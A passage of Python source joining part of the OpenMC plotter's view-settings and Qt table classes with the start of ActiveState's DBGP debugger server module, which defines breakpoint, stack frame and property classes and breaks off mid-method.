# return data extents (in cm) for the tally
extents = [lower_left[h_ind], upper_right[h_ind],
lower_left[v_ind], upper_right[v_ind]]
return image_data, extents, data_min, data_max
class PlotView(openmc.lib.plot._PlotBase):
""" View settings for OpenMC plot.
Parameters
----------
origin : 3-tuple of floats
Origin (center) of plot view
width: float
Width of plot view in model units
height : float
Height of plot view in model units
Attributes
----------
origin : 3-tuple of floats
Origin (center) of plot view
width : float
Width of the plot view in model units
height : float
Height of the plot view in model units
h_res : int
Horizontal resolution of plot image
v_res : int
Vertical resolution of plot image
aspectLock : bool
Indication of whether aspect lock should be maintained to
prevent image stretching/warping
basis : {'xy', 'xz', 'yz'}
The basis directions for the plot
colorby : {'cell', 'material', 'temperature', 'density'}
Indication of whether the plot should be colored by cell or material
masking : bool
Indication of whether cell/material masking is active
maskBackground : 3-tuple of int
RGB color to apply to masked cells/materials
highlighting: bool
Indication of whether cell/material highlighting is active
highlightBackground : 3-tuple of int
RGB color to apply to non-highlighted cells/materials
highlightAlpha : float between 0 and 1
Alpha value for highlight background color
highlightSeed : int
Random number seed used to generate color scheme when highlighting
is active
domainBackground : 3-tuple of int
RGB color to apply to plot background
color_overlaps : bool
Indicator of whether or not overlaps will be shown
overlap_color : 3-tuple of int
RGB color to apply for cell overlap regions
cells : Dict of DomainView instances
Dictionary of cell view settings by ID
materials : Dict of DomainView instances
Dictionary of material view settings by ID
domainAlpha : float between 0 and 1
Alpha value of the geometry plot
plotVisibile : bool
Controls visibility of geometry
outlines: bool
Controls visibility of geometry outlines
tallyDataColormap : str
Name of the colormap used for tally data
tallyDataVisible : bool
Indicator for whether or not the tally data is visible
tallyDataAlpha : float
Value of the tally image alpha
tallyDataIndicator : bool
Indicates whether or not the data indicator is active on the tally colorbar
tallyDataMin : float
Minimum scale value for tally data
tallyDataMax : float
Minimum scale value for tally data
tallyDataLogScale : bool
Indicator of logarithmic scale for tally data
tallyMaskZeroValues : bool
Indicates whether or not zero values in tally data should be masked
clipTallyData: bool
Indicates whether or not tally data is clipped by the colorbar min/max
tallyValue : str
Indicator for what type of value is displayed in plots.
tallyContours : bool
Indicates whether or not tallies are displayed as contours
tallyContourLevels : str
Number of contours levels or explicit level values
selectedTally : str
Label of the currently selected tally
"""
def __init__(self, origin, width, height):
""" Initialize PlotView attributes """
super().__init__()
# View Parameters
self.level = -1
self.origin = origin
self.width = width
self.height = height
self.h_res = 1000
self.v_res = 1000
self.aspectLock = True
self.basis = 'xy'
# Geometry Plot
self.colorby = 'material'
self.masking = True
self.maskBackground = (0, 0, 0)
self.highlighting = False
self.highlightBackground = (80, 80, 80)
self.highlightAlpha = 0.5
self.highlightSeed = 1
self.domainBackground = (50, 50, 50)
self.overlap_color = (255, 0, 0)
self.domainAlpha = 1.0
self.domainVisible = True
self.outlines = False
self.colormaps = {'temperature': 'Oranges', 'density': 'Greys'}
# set defaults for color dialog
self.data_minmax = {prop: (0.0, 0.0) for prop in _MODEL_PROPERTIES}
self.user_minmax = {prop: (0.0, 0.0) for prop in _MODEL_PROPERTIES}
self.use_custom_minmax = {prop: False for prop in _MODEL_PROPERTIES}
self.data_indicator_enabled = {prop: False for prop in _MODEL_PROPERTIES}
self.color_scale_log = {prop: False for prop in _MODEL_PROPERTIES}
# Get model domain info
self.cells = self.getDomains('cell')
self.materials = self.getDomains('material')
# Tally Viz Settings
self.tallyDataColormap = 'spectral'
self.tallyDataVisible = True
self.tallyDataAlpha = 1.0
self.tallyDataIndicator = False
self.tallyDataUserMinMax = False
self.tallyDataMin = 0.0
self.tallyDataMax = np.inf
self.tallyDataLogScale = False
self.tallyMaskZeroValues = False
self.clipTallyData = False
self.tallyValue = "Mean"
self.tallyContours = False
self.tallyContourLevels = ""
self.selectedTally = None
def __hash__(self):
return hash(self.__dict__.__str__() + self.__str__())
@staticmethod
def getDomains(domain_type):
""" Return dictionary of domain settings.
Retrieve cell or material ID numbers and names from .xml files
and convert to DomainView instances with default view settings.
Parameters
----------
domain_type : {'cell', 'material'}
Type of domain to retrieve for dictionary
Returns
-------
domains : Dictionary of DomainView instances
Dictionary of cell/material DomainView instances keyed by ID
"""
if domain_type not in ('cell', 'material'):
raise ValueError("Domain type, {}, requested is neither "
"'cell' nor 'material'.".format(domain_type))
lib_domain = None
if domain_type == 'cell':
lib_domain = openmc.lib.cells
elif domain_type == 'material':
lib_domain = openmc.lib.materials
domains = {}
for domain, domain_obj in lib_domain.items():
name = domain_obj.name
domains[domain] = DomainView(domain, name, random_rgb())
# always add void to a material domain at the end
if domain_type == 'material':
void_id = _VOID_REGION
domains[void_id] = DomainView(void_id, "VOID",
(255, 255, 255),
False,
False)
return domains
def getDataLimits(self):
return self.data_minmax
def getColorLimits(self, property):
if self.use_custom_minmax[property]:
return self.user_minmax[property]
else:
return self.data_minmax[property]
@property
def llc(self):
if self.basis == 'xy':
x = self.origin[0] - self.width / 2.0
y = self.origin[1] - self.height / 2.0
z = self.origin[2]
elif self.basis == 'yz':
x = self.origin[0]
y = self.origin[1] - self.width / 2.0
z = self.origin[2] - self.height / 2.0
else:
x = self.origin[0] - self.width / 2.0
y = self.origin[1]
z = self.origin[2] - self.height / 2.0
return x, y, z
@property
def urc(self):
if self.basis == 'xy':
x = self.origin[0] + self.width / 2.0
y = self.origin[1] + self.height / 2.0
z = self.origin[2]
elif self.basis == 'yz':
x = self.origin[0]
y = self.origin[1] + self.width / 2.0
z = self.origin[2] + self.height / 2.0
else:
x = self.origin[0] + self.width / 2.0
y = self.origin[1]
z = self.origin[2] + self.height / 2.0
return x, y, z
def adopt_plotbase(self, view):
"""
Applies only the geometric aspects of a view to the current view
Parameters
----------
view : PlotView
View to take parameters from
"""
self.origin = view.origin
self.width = view.width
self.height = view.height
self.h_res = self.h_res
self.v_res = self.v_res
self.basis = view.basis
class DomainView():
""" Represents view settings for OpenMC cell or material.
Parameters
----------
id : int
Unique identifier for cell/material
name : str
Name of cell/material
color : 3-tuple of int or str
RGB or SVG color of cell/material (defaults to None)
masked : bool
Indication of whether cell/material should be masked
(defaults to False)
highlight : bool
Indication of whether cell/material should be highlighted
(defaults to False)
"""
def __init__(self, id, name, color=None, masked=False, highlight=False):
""" Initialize DomainView instance """
self.id = id
self.name = name
self.color = color
self.masked = masked
self.highlight = highlight
def __repr__(self):
return ("id: {} \nname: {} \ncolor: {} \
\nmask: {} \nhighlight: {}\n\n".format(self.id,
self.name,
self.color,
self.masked,
self.highlight))
def __eq__(self, other):
if isinstance(other, DomainView):
return self.__dict__ == other.__dict__
class DomainTableModel(QAbstractTableModel):
""" Abstract Table Model of cell/material view attributes """
def __init__(self, domains):
super().__init__()
self.domains = [dom for dom in domains.values()]
def rowCount(self, index=QModelIndex()):
return len(self.domains)
def columnCount(self, index=QModelIndex()):
return 6
def data(self, index, role=Qt.DisplayRole):
if not index.isValid() or not (0 <= index.row() < len(self.domains)):
return None
domain = self.domains[index.row()]
column = index.column()
if role == Qt.DisplayRole:
if column == ID:
return domain.id
elif column == NAME:
return domain.name if domain.name is not None else '--'
elif column == COLOR:
return '' if domain.color is not None else '+'
elif column == COLORLABEL:
return str(domain.color) if domain.color is not None else '--'
elif column == MASK:
return None
elif column == HIGHLIGHT:
return None
elif role == Qt.ToolTipRole:
if column == NAME:
return 'Double-click to edit'
elif column in (COLOR, COLORLABEL):
return 'Double-click to edit \nRight-click to clear'
elif column in (MASK, HIGHLIGHT):
return 'Click to toggle'
elif role == Qt.TextAlignmentRole:
if column in (MASK, HIGHLIGHT, COLOR):
return int(Qt.AlignCenter | Qt.AlignVCenter)
else:
return int(Qt.AlignLeft | Qt.AlignVCenter)
elif role == Qt.BackgroundColorRole:
color = domain.color
if column == COLOR:
if isinstance(color, tuple):
return QColor.fromRgb(*color)
elif isinstance(color, str):
return QColor.fromRgb(*openmc.plots._SVG_COLORS[color])
elif role == Qt.CheckStateRole:
if column == MASK:
return Qt.Checked if domain.masked else Qt.Unchecked
elif column == HIGHLIGHT:
return Qt.Checked if domain.highlight else Qt.Unchecked
return None
def headerData(self, section, orientation, role=Qt.DisplayRole):
if role == Qt.TextAlignmentRole:
if orientation == Qt.Horizontal:
return int(Qt.AlignLeft | Qt.AlignVCenter)
return int(Qt.AlignRight | Qt.AlignVCenter)
elif role == Qt.DisplayRole:
if orientation == Qt.Horizontal:
headers = ['ID', 'Name', 'Color',
'SVG/RGB', 'Mask', 'Highlight']
return headers[section]
return int(section + 1)
return None
def flags(self, index):
if not index.isValid():
return Qt.ItemIsEnabled
elif index.column() in (MASK, HIGHLIGHT):
return Qt.ItemFlags(Qt.ItemIsEnabled | Qt.ItemIsUserCheckable |
Qt.ItemIsSelectable)
elif index.column() in (NAME, COLORLABEL):
return Qt.ItemFlags(Qt.ItemIsEnabled | Qt.ItemIsEditable |
Qt.ItemIsSelectable)
elif index.column() == COLOR:
return Qt.ItemFlags(Qt.ItemIsEnabled | Qt.ItemIsEditable)
else:
return Qt.ItemFlags(Qt.ItemIsEnabled | Qt.ItemIsSelectable)
def setData(self, index, value, role=Qt.EditRole):
if not index.isValid() or not (0 <= index.row() < len(self.domains)):
return False
domain = self.domains[index.row()]
column = index.column()
if column == NAME:
domain.name = value if value else None
elif column == COLOR:
domain.color = value
elif column == COLORLABEL:
domain.color = value
elif column == MASK:
if role == Qt.CheckStateRole:
domain.masked = True if value == Qt.Checked else False
elif column == HIGHLIGHT:
if role == Qt.CheckStateRole:
domain.highlight = True if value == Qt.Checked else False
self.dataChanged.emit(index, index)
return True
class DomainDelegate(QItemDelegate):
def __init__(self, parent=None):
super().__init__(parent)
def sizeHint(self, option, index):
fm = option.fontMetrics
column = index.column()
if column == ID:
return QSize(fm.boundingRect("XXXXXX").width(), fm.height())
elif column == COLOR:
return QSize(fm.boundingRect("XXXXXX").width(), fm.height())
elif column == COLORLABEL:
return QSize(fm.boundingRect("X(XXX, XXX, XXX)X").width(), fm.height())
elif column == MASK:
return QSize(fm.boundingRect("XXXX").width(), fm.height())
else:
return QItemDelegate.sizeHint(self, option, index)
def createEditor(self, parent, option, index):
if index.column() == COLOR:
dialog = QColorDialog(parent)
return dialog
elif index.column() == COLORLABEL:
return QLineEdit(parent)
else:
return QItemDelegate.createEditor(self, parent, option, index)
def setEditorData(self, editor, index):
if index.column() == COLOR:
color = index.data(Qt.BackgroundColorRole)
color = 'white' if color is None else color
editor.setCurrentColor(color)
elif index.column() in (NAME, COLORLABEL):
text = index.data(Qt.DisplayRole)
if text != '--':
editor.setText(text)
def editorEvent(self, event, model, option, index):
if index.column() in (COLOR, COLORLABEL):
if not int(index.flags() & Qt.ItemIsEditable) > 0:
return False
if event.type() == QEvent.MouseButtonRelease \
and event.button() == Qt.RightButton:
self.setModelData(None, model, index)
return True
return False
else:
return QItemDelegate.editorEvent(self, event, model, option, index)
def setModelData(self, editor, model, index):
row = index.row()
column = index.column()
if column == COLOR and editor is None:
model.setData(index, None, Qt.BackgroundColorRole)
model.setData(model.index(row, column+1), None, Qt.DisplayRole)
elif column == COLOR:
color = editor.currentColor()
if color != QColor():
color = color.getRgb()[:3]
model.setData(index, color, Qt.BackgroundColorRole)
model.setData(model.index(row, column+1),
color,
Qt.DisplayRole)
elif column == COLORLABEL:
if editor is None:
model.setData(model.index(row, column-1),
None,
Qt.BackgroundColorRole)
model.setData(index, None, Qt.DisplayRole)
elif editor.text().lower() in openmc.plots._SVG_COLORS:
svg = editor.text().lower()
color = openmc.plots._SVG_COLORS[svg]
model.setData(model.index(row, column-1),
color,
Qt.BackgroundColorRole)
model.setData(index, svg, Qt.DisplayRole)
else:
try:
input = literal_eval(editor.text())
except (ValueError, SyntaxError):
return None
if not isinstance(input, tuple) or len(input) != 3:
return None
for val in input:
if not isinstance(val, int) or not 0 <= val <= 255:
return None
model.setData(model.index(row, column-1),
input,
Qt.BackgroundColorRole)
model.setData(index, input, Qt.DisplayRole)
else:
QItemDelegate.setModelData(self, editor, model, index)
|
server.py
|
#!/usr/bin/env python
# Copyright (c) 2003-2006 ActiveState Software Inc.
#
# The MIT License
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify,
# merge, publish, distribute, sublicense, and/or sell copies of the
# Software, and to permit persons to whom the Software is furnished
# to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
#
# Authors:
# Shane Caraveo <ShaneC@ActiveState.com>
# Trent Mick <TrentM@ActiveState.com>
"""DBGP Server API module.
Generally this builds upon the lower-level dbgp.serverBase module to provide
a full module interface for a DBGP server. This module interface can be
used to provide a command-line or GUI debugger interface using the DBGP
protocol.
"""
import os
import sys
import socket, string, base64, urllib
import threading
import types
import logging
from xml.dom import minidom
import copy
import dbgp.listcmd as listcmd
import dbgp.serverBase
from dbgp.common import *
#XXX Try to avoid dependence on PyXPCOM infrastructure in this file.
try:
from xpcom import COMException, ServerException
except ImportError:
COMException = ServerException = None
#---- globals
log = logging.getLogger("dbgp.server")
#log.setLevel(logging.DEBUG)
proplog = logging.getLogger("dbgp.property")
#proplog.setLevel(logging.DEBUG)
bplog = logging.getLogger("dbgp.breakpoints")
#bplog.setLevel(logging.DEBUG)
#---- internal support routines
#Note: this is not prefixed with "_" because it is being used in koDBGP.py.
def getErrorInfo(ex):
"""Given a DBGPError exception return (errno, errmsg).
This is a separate method because (1) the assignment of args to DBGPError
is not consistent and (2) the exception may also be an XPCOM COMException,
in which case error info is expected to be on koILastErrorService.
"""
if isinstance(ex, DBGPError):
#XXX _Try_ to get the error message out of the DBGPError. There
# is no good standard for DBGPError args right now though,
# hence the pain here.
if len(ex.args) == 2: # typically this is (errmsg, errno)
errmsg = ex.args[0]
try:
errno = int(ex.args[1]) # sometimes this is a string
except ValueError:
errno = 0
elif len(ex.args) == 1 and not hasattr(ex.args[0], "__len__"):
# bug94837: if we're hovering over an unevaluate-able string,
# we only get the numeric code in ex.args, so pull the message
# out of ex.msg
try:
errmsg = ex.msg
errno = ex.args[0]
except:
pass
else:
errmsg = ex.args[0]
errno = 0
elif isinstance(ex, COMException):
from xpcom import components
lastErrorSvc = components.classes["@activestate.com/koLastErrorService;1"].\
getService(components.interfaces.koILastErrorService)
errno, errmsg = lastErrorSvc.getLastError()
return (errno, errmsg)
#---- DBGP server class hierarchy
class dataType:
def __init__(self):
self.commonType = '';
self.languageType = '';
self.schemaType = '';
def initWithNode(self, node):
self.commonType = node.getAttribute('type')
self.languageType = node.getAttribute('name')
if node.hasAttribute('xsi:type'):
self.schemaType = node.getAttribute('xsi:type')
def __repr__(self):
return "%s:%s:%s" % (self.commonType, self.languageType, self.schemaType)
class breakpoint:
"""A DBGP Breakpoint.
Mostly this is a "dumb" object that just holds the relevant breakpoint
attributes. It knows how to update and clone itself, but not much more.
"""
# List of data attributes relevant for persistence and updating.
# Note: This last must be kept in sync with the DBGP breakpoint spec.
_attrs = ["language", "type", "filename", "lineno", "functionName",
"state", "hitCount", "hitValue", "hitCondition", "temporary",
"exceptionName", "expression"]
def __init__(self):
# Core breakpoint attributes. These should only be modified either
# (1) by initializing via one of the .init*() methods; or
# (2) via the breakpointManager.
self.language = ''
self.type = ''
self.filename = ''
self.lineno = -1
self.functionName = ''
self.state = 'enabled'
self.exceptionName = ''
self.expression = ''
self.temporary = 0
self.hitCount = 0
self.hitValue = 0
self.hitCondition = None
# A unique breakpoint id (a number) that is assigned and controlled
# by the breakpointManager.
# Note: This is not just called "id" to avoid confusion with the
# breakpoint id's assigned by each session.
# Note: While called a "guid", this is NOT one of those long COM
# GUID strings, e.g. {5F7CB810-0AC8-4BBD-B8C1-8470E516EDBC}.
self._guid = None
# the breakpoint id as set by the debugger engine
self._bpid = None
def getGuid(self):
return self._guid
def clone(self):
"""Return a copy of this breakpoint.
This is required for proper updating of a breakpoint via
breakpointUpdate.
"""
return copy.copy(self)
def update(self, bp):
"""Update with the given breakpoint data and return a list of
changed attributes.
"""
attrNames = []
for attrName in self._attrs:
try:
oldValue = getattr(self, attrName)
except Exception, ex:
log.error("failed to get old value of '%s' attribute: %s",
attrName, ex)
raise
try:
newValue = getattr(bp, attrName)
except Exception, ex:
log.error("failed to get new value of '%s' attribute: %s",
attrName, ex)
raise
if newValue != oldValue:
attrNames.append(attrName)
try:
setattr(self, attrName, newValue)
except Exception, ex:
log.error("update of '%s' attribute to '%s' failed: %s",
attrName, newValue, ex)
raise
return attrNames
def getName(self):
if self.type == "line":
name = "%s, line %s" % (os.path.basename(self.filename), self.lineno)
elif self.type in ["conditional", "watch"]:
name = "'%s' watched" % self.expression
if self.filename:
name += " in %s" % os.path.basename(self.filename)
if self.lineno >= 1:
name += ", line %s" % self.lineno
elif self.type in ["call", "return"]:
name = "%s %s" % (self.functionName, self.type)
if self.filename:
name += " in %s" % os.path.basename(self.filename)
elif self.type == "exception":
name = "Exception %s" % self.exceptionName
if self.filename:
name += " in %s" % os.path.basename(self.filename)
else:
log.error("unknown breakpoint type: '%s'" % self.type)
name = "???"
return name
#---- Breakpoint initialization methods.
def initConditional(self, lang, cond, file, line, state, temporary=None,
hitValue=None, hitCondition=None):
self.language = lang
self.type = 'conditional'
self.filename = file
self.lineno = line
self.state = state
self.expression = cond
self.temporary = temporary
self.hitValue = hitValue
self.hitCondition = hitCondition
def initWatch(self, lang, watch, file, line, state, temporary=None,
hitValue=None, hitCondition=None):
self.language = lang
self.type = 'watch'
self.filename = file
self.lineno = line
self.state = state
self.expression = watch
self.temporary = temporary
self.hitValue = hitValue
self.hitCondition = hitCondition
def initLine(self, lang, file, line, state, temporary=None,
hitValue=None, hitCondition=None):
self.language = lang
self.type = 'line'
self.filename = file
self.lineno = line
self.state = state
self.temporary = temporary
self.hitValue = hitValue
self.hitCondition = hitCondition
def initException(self, lang, exceptionName, state, temporary=None,
hitValue=None, hitCondition=None):
self.language = lang
self.type = 'exception'
self.state = state
self.exceptionName = exceptionName
self.temporary = temporary
self.hitValue = hitValue
self.hitCondition = hitCondition
def initCall(self, lang, func, filename, state, temporary=None,
hitValue=None, hitCondition=None):
self.language = lang
self.type = 'call'
self.filename = filename
self.functionName = func
self.state = state
self.temporary = temporary
self.hitValue = hitValue
self.hitCondition = hitCondition
def initReturn(self, lang, func, filename, state, temporary=None,
hitValue=None, hitCondition=None):
self.language = lang
self.type = 'return'
self.filename = filename
self.functionName = func
self.state = state
self.temporary = temporary
self.hitValue = hitValue
self.hitCondition = hitCondition
def initWithNode(self, node):
# id="%d" type="%s" filename="%s" lineno="%d" function="%s"
# state="%s" exception="%s"
# expression is a child element with name of expression
self.type = node.getAttribute('type')
if node.hasAttribute('id'):
self._bpid = node.getAttribute('id')
if node.hasAttribute('filename'):
self.filename = node.getAttribute('filename')
if node.hasAttribute('lineno'):
self.lineno = int(node.getAttribute('lineno'))
if node.hasAttribute('function'):
self.functionName = node.getAttribute('function')
if node.hasAttribute('state'):
self.state = node.getAttribute('state')
if node.hasAttribute('exception'):
self.exceptionName = node.getAttribute('exception')
if node.hasAttribute('temporary'):
self.temporary = int(node.getAttribute('temporary'))
if node.hasAttribute('hit_count'):
self.hitCount = int(node.getAttribute('hit_count'))
if node.hasAttribute('hit_value'):
self.hitValue = int(node.getAttribute('hit_value'))
if node.hasAttribute('hit_condition'):
self.hitCondition = node.getAttribute('hit_condition')
if self.type == 'expression':
try:
self.expression = base64.decodestring(node.firstChild.firstChild.nodeValue)
except:
self.expression = node.firstChild.firstChild.nodeValue
def __repr__(self):
data = ("type:%(type)s filename:%(filename)s "
"lineno:%(lineno)s function:%(functionName)s state:%(state)s "
"exception:%(exceptionName)s expression:%(expression)s "
"temporary:%(temporary)s hit_count:%(hitCount)s "
"hit_value:%(hitValue)s hit_condition:%(hitCondition)s"
% self.__dict__)
return "<%s: %s>" % (self.__class__, data)
def getSetArgs(self):
"""Return a list of options for a 'breakpoint_set' command."""
args = ['-t', self.type]
data = None
if self.filename:
filename = self.filename
if filename[8:].startswith('file:/'):
filename = self.filename[8:]
args += ['-f', filename]
if self.type == 'line':
args += ['-n', self.lineno]
elif self.type in ['call', 'return']:
args += ['-m', self.functionName]
elif self.type == 'exception':
args += ['-x', self.exceptionName]
elif self.type in ['conditional', 'watch']:
if self.lineno:
args += ['-n', self.lineno]
data = self.expression
else:
raise DBGPError('breakpoint type [%s] not supported' % self.type)
if self.state:
args += ['-s', self.state]
# Add common optional arguments, if necessary.
args += ['-r', int(self.temporary)]
if self.hitValue is not None:
args += ['-h', self.hitValue]
if self.hitCondition:
args += ['-o', self.hitCondition]
args = [str(i) for i in args] # Return a stringified command version.
return (args, data)
class spawnpoint(breakpoint):
"""A DBGP Spawnpoint.
XXX Inheriting from koIDBGPBreakpoint is messy (because it is not a
a proper superset). Should find a common base and use that.
"""
# List of data attributes relevant for persistence and updating.
# Note: This last must be kept in sync with the DBGP spawnpoint spec.
_attrs = ["language", "type", "filename", "lineno", "state"]
def init(self, lang, filename, line, state):
self.language = lang
self.type = 'spawn'
self.filename = filename
self.lineno = line
self.state = state
def getName(self):
name = "%s, line %s" % (os.path.basename(self.filename), self.lineno)
return name
def __repr__(self):
data = ("type:%(type)s filename:%(filename)s "
"lineno:%(lineno)s state:%(state)s "
% self.__dict__)
return "<%s: %s>" % (self.__class__, data)
def getSetArgs(self):
"""Return a list of options for a 'spawnpoint_set' command."""
# tcl doesn't do any magic for us, we must be explicit
filename = self.filename
if filename[8:].startswith('file:/'):
filename = self.filename[8:]
args = ['-s', self.state,
'-n', self.lineno,
'-f', self.filename]
args = [str(i) for i in args] # Return a stringified command version.
return (args, None)
class contextType:
def __init__(self):
self.id = -1
self.name = ''
def initWithNode(self, node):
# name="Local" id="0"
if node.hasAttribute('id'):
self.id = int(node.getAttribute('id'))
self.name = node.getAttribute('name')
def __repr__(self):
return "%d: %s" %(self.id, self.name)
class stackFrame:
def __init__(self):
self.depth = -1
self.filename = ''
self.lineno = -1
self.type = ''
self.where = ''
self.beginLine = 0
self.beginOffset = 0
self.endLine = 0
self.endOffset = 0
self.inputFrame = None
def initWithNode(self, node):
# level="%d" type="%s" filename="%s" lineno="%d" where="%s"
if node.hasAttribute('level'):
self.depth = int(node.getAttribute('level'))
if node.hasAttribute('filename'):
self.filename = node.getAttribute('filename')
if node.hasAttribute('lineno'):
self.lineno = int(node.getAttribute('lineno'))
if node.hasAttribute('type'):
self.type = node.getAttribute('type')
if node.hasAttribute('where'):
self.where = node.getAttribute('where')
if node.hasAttribute('cmdbegin'):
begin = node.getAttribute('cmdbegin')
try:
(self.beginLine, self.beginOffset) = begin.split(':')
except:
# if the attribute is invalid, ignore it
log.warn('stack cmdbegin attribute is incorrect [%s]', begin)
if node.hasAttribute('cmdend'):
end = node.getAttribute('cmdend')
try:
(self.endLine, self.endOffset) = end.split(':')
except:
# if the attribute is invalid, ignore it
log.warn('stack cmdend attribute is incorrect [%s]', end)
input = node.getElementsByTagName('input')
if len(input) > 0:
# XXX more than one input frame?
self.inputFrame = stackFrame()
self.inputFrame.initWithNode(input[0])
def __repr__(self):
return "frame: %d %s(%d) %s %s" % \
(self.depth, self.filename, self.lineno, self.type, self.where)
class property:
_tooltip = None
def __init__(self):
_tooltip = None
self.name = ''
self.id = ''
self.fullname = ''
self.type = ''
self.typeName = ''
self.typeScheme = ''
self.classname = ''
self.facets = ''
self.size = 0
self.children = 0
self.numchildren = 0
self.address = 0
self.recursive = 0
self.encoding = ''
self.key = ''
self.value = ''
self.node = None
self.childProperties = []
self.session = None
self.contextId = 0
self.depth = 0
def _getCData(self, node):
value = ''
encoding = ''
if node.hasAttribute('encoding'):
encoding = node.getAttribute('encoding')
for child in node.childNodes:
if child.nodeType in [minidom.Node.TEXT_NODE,
minidom.Node.CDATA_SECTION_NODE]:
value = value + child.nodeValue
try:
if value and (self.encoding == 'base64' or encoding == 'base64'):
value = base64.decodestring(value)
except:
pass
return value
def _decode_unicode_or_byte_string(self, s, name):
# The only reason for this function is that PHP/Xdebug
# leaves the name and fullname attributes as raw, utf-8 strings.
# It should store them in name and fullname tags, with a
# base64-encoding
try:
if type(s) == types.UnicodeType:
return s.encode('latin1').decode('utf-8')
elif type(s) == types.StringType:
return s.decode('utf-8')
except UnicodeDecodeError:
proplog.warn("Unable to decode attr %s, value %r", name, s)
return s
def _ensure_unicode(self, s, context):
# Any string that goes through pyxpcom as an AString should be
# converted to Unicode. Otherwise pyxpcom will do whatever it feels
# like to convert the string. Sometimes it gets it right, but
# other times it treats latin1 as utf-8 (and complains about invalid
# bytes, or treats utf-8 as latin1 (and we get doubly-escaped utf8).
# Also, it if treats an encoding like a cyrillic one as latin1, the
# resulting characters won't be recognizable.
#
# Doing this fixes this problem.
if isinstance(s, str):
try:
return s.decode("utf-8")
except UnicodeDecodeError:
try:
return s.decode('latin1')
except:
proplog.exception("property.%s: Failed to convert %r", value, context)
return s
# These methods are XPCOM getters. Use methods to allow converting
# them into Unicode strings as they're AString values in the IDL.
def get_value(self):
return self._ensure_unicode(self.value, "value")
def get_name(self):
return self._ensure_unicode(self.name, "name")
def get_fullname(self):
return self._ensure_unicode(self.fullname, "fullname")
def initWithNode(self, session, node, context = 0, depth = 0):
self.session = session
# name="%s" fullname="%s" type="%s" children="%d" size="%d"
# if children:
# page="%d" pagesize="%d" numchildren="%d"
# if string type:
# encoding="%s"
self.contextId = context
self.depth = depth
if node.hasAttribute('name'):
self.name = self._decode_unicode_or_byte_string(node.getAttribute('name'),
'name')
if node.hasAttribute('fullname'):
self.fullname = self._decode_unicode_or_byte_string(node.getAttribute('fullname'),
'fullname')
if node.hasAttribute('classname'):
self.classname = node.getAttribute('classname')
if node.hasAttribute('encoding'):
self.encoding = node.getAttribute('encoding')
proplog.debug("property encoding is %s", self.encoding)
for child in node.childNodes:
if child.nodeType == minidom.Node.ELEMENT_NODE and \
child.tagName == 'name':
self.name = self._getCData(child)
elif child.nodeType == minidom.Node.ELEMENT_NODE and \
child.tagName == 'fullname':
self.fullname = self._getCData(child)
elif child.nodeType == minidom.Node.ELEMENT_NODE and \
child.tagName == 'classname':
self.classname = self._getCData(child)
elif child.nodeType == minidom.Node.ELEMENT_NODE and \
child.tagName == 'value':
self.value = self._getCData(child)
self.type = node.getAttribute('type')
if session and self.type in session._typeMap:
self.typeName = session._typeMap[self.type].commonType
self.typeScheme = session._typeMap[self.type].schemaType
else:
self.typeName = self.type
if node.hasAttribute('size'):
self.size = int(node.getAttribute('size'))
if node.hasAttribute('children'):
self.children = int(node.getAttribute('children'))
if self.children:
self.numchildren = 0
page = 0
pagesize = 0
if node.hasAttribute('page'):
page = int(node.getAttribute('page'))
if node.hasAttribute('pagesize'):
pagesize = int(node.getAttribute('pagesize'))
if node.hasAttribute('numchildren'):
self.numchildren = int(node.getAttribute('numchildren'))
index = page * pagesize
for child in node.childNodes:
if child.nodeType == minidom.Node.ELEMENT_NODE and \
child.tagName == 'property':
p = property()
p.initWithNode(self.session, child, self.contextId, self.depth)
self.childProperties.insert(index, p)
index = index + 1
if node.hasAttribute('key'):
self.key = node.getAttribute('key')
if node.hasAttribute('address'):
self.address = node.getAttribute('address')
# we may have more than one text node, get them all
if not self.value:
self.value = self._getCData(node)
self.node = node
def __repr__(self):
return "name: %s type: %s value: %s" % \
(self.name, self.type, self.value)
#void getChildren(in long page,
# [array, size_is(count)] out koIDBGPProperty properties,
# out PRUint32 count);
def getChildren(self, page):
pagesize = self.session.maxChildren
start = page * pagesize
end = start + pagesize
if end >= self.numchildren:
end = self.numchildren
proplog.debug("getChildren num %d start %r end %r have %r",
self.numchildren, start, end, len(self.childProperties))
if end > len(self.childProperties):
proplog.debug("getChildren getting children")
p = self.session.propertyGetEx(self.contextId,
self.depth,
self.fullname,
0,
'',
page)
# property is a duplicate of self. we need to copy it's
# children into ours
s = p.childProperties
s.reverse()
index = start
while s:
self.childProperties.insert(index, s.pop())
index = index + 1
proplog.debug("getChildren returning %d children", len(self.childProperties[start:end]))
return self.childProperties[start:end]
def getChildrenNextPage(self):
if len(self.childProperties) >= self.numchildren:
return None
import math
page = long(math.floor(len(self.childProperties) / self.session.maxChildren))
return self.getChildren(page)
def getAvailableChildren(self):
return self.childProperties
#void getAllChildren([array, size_is(count)] out koIDBGPProperty properties,
# out PRUint32 count);
def getAllChildren(self):
page = 0
# self.childProperties = []
while len(self.childProperties) < self.numchildren:
#proplog.debug("getAllChildren getPage %d", page)
if not self.getChildren(page):
break
page = page + 1
return self.childProperties
def setValue(self, value, type):
prop = self.session.propertyUpdate(self, value, type)
if prop:
self.type = prop.type
self.typeName = prop.typeName
self.typeScheme = prop.typeScheme
self.classname = prop.classname
self.facets = prop.facets
self.size = prop.size
self.children = prop.children
self.numchildren = prop.numchildren
self.address = prop.address
self.recursive = prop.recursive
self.encoding = prop.encoding
self.key = prop.key
self.value = prop.value
self.node = prop.node
self.childProperties = prop.childProperties
self.contextId = prop.contextId
self.depth = prop.depth
def getValue(self):
if self.size > len(self.value):
self.value = self.session.propertyValueEx(self.contextId, self.depth, self.fullname)
return self.value
_MAX_VALUE_LEN = 160
def getTooltip(self, maxTooltipLength):
